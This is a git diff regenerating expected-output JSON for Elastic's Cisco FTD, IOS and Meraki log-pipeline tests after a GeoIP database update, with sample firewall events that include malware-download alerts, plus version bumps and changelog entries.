Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", "code": "430005", "kind": "alert", @@ -904,22 +898,21 @@ "scheme": "http", "domain": "10.0.100.30" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:40:45.000Z", "file": { "size": 278987, "name": "dd3dee576d0cb4abfed00f97f0c71c1d", @@ -927,6 +920,7 @@ "sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7" } }, + "@timestamp": "2019-08-16T09:40:45.000Z", "ecs": { "version": "1.12.0" }, @@ -950,7 +944,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450207500Z", + "ingested": "2021-12-14T14:40:18.397018535Z", "original": "2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", @@ -1005,20 +999,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -1036,22 +1024,21 @@ "scheme": "http", "domain": "81.2.69.144" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "curl", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "firepower", "product": "asa", "type": "firewall", "vendor": "Cisco" }, - "@timestamp": "2019-08-16T09:42:07.000Z", "file": { "size": 278987, "name": "dd3dee576d0cb4abfed00f97f0c71c1d", @@ -1059,6 +1046,7 @@ "sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7" } }, + "@timestamp": "2019-08-16T09:42:07.000Z", "ecs": { "version": "1.12.0" }, @@ -1082,7 +1070,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:21.450211600Z", + "ingested": "2021-12-14T14:40:18.397018927Z", "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json index ba055f04e31..21678d0ca96 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json @@ -10,52 +10,40 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 80, "bytes": 246, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 65090, "bytes": 729, - "ip": "81.2.69.144", - "packets": 4 + "packets": 4, + "ip": "81.2.69.144" }, "url": { "path": "/favicon.ico", @@ -67,15 +55,15 @@ "eyedropper-color-pick.info" ] }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "chrome", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -118,7 +106,7 @@ "event": { "severity": 0, "duration": 20000000000, - "ingested": "2021-12-09T13:35:23.717443400Z", + "ingested": "2021-12-14T14:40:20.860831313Z", "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/manifest.yml b/packages/cisco_ftd/manifest.yml index 5401420f54b..31a83dcd98f 100644 --- a/packages/cisco_ftd/manifest.yml +++ b/packages/cisco_ftd/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_ftd title: Cisco FTD -version: 1.2.1 +version: 1.2.2 license: basic description: Collect logs from Cisco FTD with Elastic Agent. type: integration diff --git a/packages/cisco_ios/changelog.yml b/packages/cisco_ios/changelog.yml index 11ff65eda30..dc5a9f19fa8 100644 --- a/packages/cisco_ios/changelog.yml +++ b/packages/cisco_ios/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json index 83f9ae2f713..ec62e75bacc 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json @@ -1,6 +1,15 @@ { "expected": [ { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.197", + "224.0.0.22" + ] + }, "log": { "level": "informational", "source": { @@ -17,28 +26,10 @@ "ip": "192.168.100.197" }, "message": "list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=", - "transport": "igmp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.197", - "224.0.0.22" - ] - }, "event": { "severity": 6, "sequence": 585917, - "ingested": "2021-12-09T13:35:26.832459800Z", + "ingested": "2021-12-14T14:40:24.398623068Z", "original": "Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet", "code": "IPACCESSLOGRP", "provider": "firewall", @@ -51,6 +42,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=", + "transport": "igmp", + "type": "ipv4", + "packets": 1 } }, { @@ -94,7 +94,7 @@ "event": { "severity": 6, "sequence": 585918, - "ingested": "2021-12-09T13:35:26.832466400Z", + "ingested": "2021-12-14T14:40:24.398625713Z", "original": "Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet", "code": "IPACCESSLOGSP", "provider": "firewall", @@ -110,6 +110,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.1", + "255.255.255.255" + ] + }, "log": { "level": "informational", "source": { @@ -126,27 +135,10 @@ "ip": "192.168.100.1" }, "message": "list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4", - "iana_number": "0", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.1", - "255.255.255.255" - ] - }, "event": { "severity": 6, "sequence": 585919, - "ingested": "2021-12-09T13:35:26.832471900Z", + "ingested": "2021-12-14T14:40:24.398626168Z", "original": "Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet", "code": "IPACCESSLOGNP", "provider": "firewall", @@ -159,9 +151,25 @@ "facility": "SEC", "access_list": "171" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4", + "iana_number": "0", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + ] + }, "log": { "level": "informational", "source": { @@ -171,18 +179,12 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 22, @@ -191,18 +193,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 1027, @@ -210,27 +206,10 @@ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=", - "transport": "tcp", - "type": "ipv6", - "packets": 9 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" - ] - }, "event": { "severity": 6, "sequence": 585920, - "ingested": "2021-12-09T13:35:26.832477600Z", + "ingested": "2021-12-14T14:40:24.398626589Z", "original": "May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets", "code": "ACCESSLOGP", "provider": "firewall", @@ -243,9 +222,27 @@ "facility": "IPV6", "access_list": "ACL-IPv6-E0/0-IN/10" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=", + "transport": "tcp", + "type": "ipv6", + "packets": 9 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { @@ -264,28 +261,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { "severity": 6, "sequence": 1663303, - "ingested": "2021-12-09T13:35:26.832482100Z", + "ingested": "2021-12-14T14:40:24.398627015Z", "original": "Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -298,6 +277,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { @@ -342,7 +330,7 @@ "event": { "severity": 6, "sequence": 1663304, - "ingested": "2021-12-09T13:35:26.832487Z", + "ingested": "2021-12-14T14:40:24.398627402Z", "original": "Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet", "code": "IPACCESSLOGDP", "provider": "firewall", @@ -358,6 +346,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { @@ -376,28 +373,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { "severity": 6, "sequence": 1663312, - "ingested": "2021-12-09T13:35:26.832491400Z", + "ingested": "2021-12-14T14:40:24.398627791Z", "original": "Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -410,6 +389,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { @@ -425,7 +413,7 @@ "event": { "severity": 6, "sequence": 1663313, - "ingested": "2021-12-09T13:35:26.832496700Z", + "ingested": "2021-12-14T14:40:24.398628192Z", "original": "Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets", "code": "IPACCESSLOGRL", "provider": "firewall", @@ -443,6 +431,15 @@ ] }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { @@ -461,28 +458,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { "severity": 6, "sequence": 1663314, - "ingested": "2021-12-09T13:35:26.832503Z", + "ingested": "2021-12-14T14:40:24.398628571Z", "original": "Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -495,9 +474,27 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.12", + "81.2.69.144" + ] + }, "log": { "level": "informational", "source": { @@ -507,20 +504,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -534,28 +525,10 @@ "ip": "192.168.100.12" }, "message": "list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=", - "transport": "tcp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.12", - "81.2.69.144" - ] - }, "event": { "severity": 6, "sequence": 1663321, - "ingested": "2021-12-09T13:35:26.832509400Z", + "ingested": "2021-12-14T14:40:24.398628952Z", "original": "Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -568,6 +541,15 @@ "facility": "SEC", "access_list": "150" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=", + "transport": "tcp", + "type": "ipv4", + "packets": 1 } }, { @@ -583,7 +565,7 @@ "event": { "severity": 6, "sequence": 1663325, - "ingested": "2021-12-09T13:35:26.832517300Z", + "ingested": "2021-12-14T14:40:24.398629359Z", "original": "Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets", "code": "IPACCESSLOGRL", "provider": "firewall", @@ -642,7 +624,7 @@ "event": { "severity": 6, "sequence": 1663326, - "ingested": "2021-12-09T13:35:26.832521600Z", + "ingested": "2021-12-14T14:40:24.398629977Z", "original": "Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets", "code": "IPACCESSLOGDP", "provider": "firewall", @@ -658,6 +640,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.12", + "81.2.69.144" + ] + }, "log": { "level": "informational", "source": { @@ -667,20 +658,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -694,28 +679,10 @@ "ip": "192.168.100.12" }, "message": "list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=", - "transport": "tcp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.12", - "81.2.69.144" - ] - }, "event": { "severity": 6, "sequence": 1663327, - "ingested": "2021-12-09T13:35:26.832527Z", + "ingested": "2021-12-14T14:40:24.398630399Z", "original": "Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -728,9 +695,29 @@ "facility": "SEC", "access_list": "150" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=", + "transport": "tcp", + "type": "ipv4", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "john.smith" + ], + "ip": [ + "10.2.55.3" + ] + }, "log": { "level": "notification", "source": { @@ -748,27 +735,10 @@ "ip": "10.2.55.3" }, "message": "Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "john.smith" - ], - "ip": [ - "10.2.55.3" - ] - }, "event": { "severity": 5, "sequence": 1991219, - "ingested": "2021-12-09T13:35:26.832533500Z", + "ingested": "2021-12-14T14:40:24.398630786Z", "original": "Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", "code": "LOGIN_SUCCESS", "provider": "firewall", @@ -780,6 +750,12 @@ "action": "Login", "facility": "SEC_LOGIN" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { @@ -807,17 +783,17 @@ "address": "10.5.36.9", "ip": "10.5.36.9" }, - "message": "User john.smith has exited tty session 5(10.5.36.9)", "event": { "severity": 6, "sequence": 1991220, - "ingested": "2021-12-09T13:35:26.832539800Z", + "ingested": "2021-12-14T14:40:24.398631171Z", "original": "Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)", "code": "LOGOUT", "provider": "firewall", "category": "network", "type": "info" }, + "message": "User john.smith has exited tty session 5(10.5.36.9)", "cisco": { "ios": { "action": "exited", @@ -836,6 +812,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.4.5.66", + "10.3.66.3" + ] + }, "log": { "level": "informational", "source": { @@ -851,26 +836,11 @@ "ip": "10.4.5.66" }, "message": "Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.4.5.66", - "10.3.66.3" - ] - }, "event": { "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-12-09T13:35:26.832546Z", + "ingested": "2021-12-14T14:40:24.398631569Z", "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", @@ -890,9 +860,24 @@ "facility": "PIM-SW1", "outcome": "invalid RP" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.4.5.66", + "10.3.66.3" + ] + }, "log": { "level": "informational", "source": { @@ -908,26 +893,11 @@ "ip": "10.4.5.66" }, "message": "Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.4.5.66", - "10.3.66.3" - ] - }, "event": { "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-12-09T13:35:26.832551200Z", + "ingested": "2021-12-14T14:40:24.398632091Z", "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", @@ -950,6 +920,12 @@ "facility": "PIM-SW1", "outcome": "invalid RP" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { @@ -965,7 +941,7 @@ "event": { "severity": 4, "sequence": 1991217, - "ingested": "2021-12-09T13:35:26.832556400Z", + "ingested": "2021-12-14T14:40:24.398632495Z", "original": "Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0", "code": "NOVALIDKEY", "provider": "firewall", @@ -995,7 +971,7 @@ "event": { "severity": 6, "sequence": 1991218, - "ingested": "2021-12-09T13:35:26.832560700Z", + "ingested": "2021-12-14T14:40:24.398632946Z", "original": "Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19", "code": "CALL_PRESERVED", "provider": "firewall", diff --git a/packages/cisco_ios/manifest.yml b/packages/cisco_ios/manifest.yml index 40e349f8834..1ad4598ec8e 100644 --- a/packages/cisco_ios/manifest.yml +++ b/packages/cisco_ios/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_ios title: Cisco IOS -version: 1.2.1 +version: 1.2.2 license: basic description: Collect logs from Cisco IOS with Elastic Agent. type: integration diff --git a/packages/cisco_meraki/changelog.yml b/packages/cisco_meraki/changelog.yml index 7b15da6b167..c72cc736f7c 100644 --- a/packages/cisco_meraki/changelog.yml +++ b/packages/cisco_meraki/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.3.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index f5f24b350da..49f5e955a54 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "modtempo 1454047799.olab nto_ 